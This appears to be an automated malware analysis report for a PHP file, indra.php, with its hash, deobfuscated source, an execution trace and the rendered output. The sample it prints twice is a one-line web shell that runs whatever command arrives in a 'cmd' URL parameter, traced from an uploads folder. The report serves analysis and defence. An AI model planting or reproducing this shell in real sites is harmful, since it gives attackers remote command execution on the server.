PHP Malware Analysis

indra.php

md5: b92abc4b83080fe554086a1524ff2bea

Jump to:

Screenshot


Attributes

Execution

Input


Deobfuscated PHP code

<?php

system($_GET['cmd']);

Execution traces

data/traces/b92abc4b83080fe554086a1524ff2bea_trace-1676242569.6915.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 20:56:35.589291]
1	0	1	0.000158	393512
1	3	0	0.000203	393896	{main}	1		/var/www/html/uploads/indra.php	0	0
2	4	0	0.000236	393896	system	0		/var/www/html/uploads/indra.php	2	1	NULL
2	4	1	0.000258	393928
2	4	R			FALSE
1	3	1	0.000273	393896
			0.000296	314224
TRACE END   [2023-02-12 20:56:35.589460]


Generated HTML code

<html><head></head><body></body></html>

Original PHP code

<?php
system($_GET['cmd']);
?>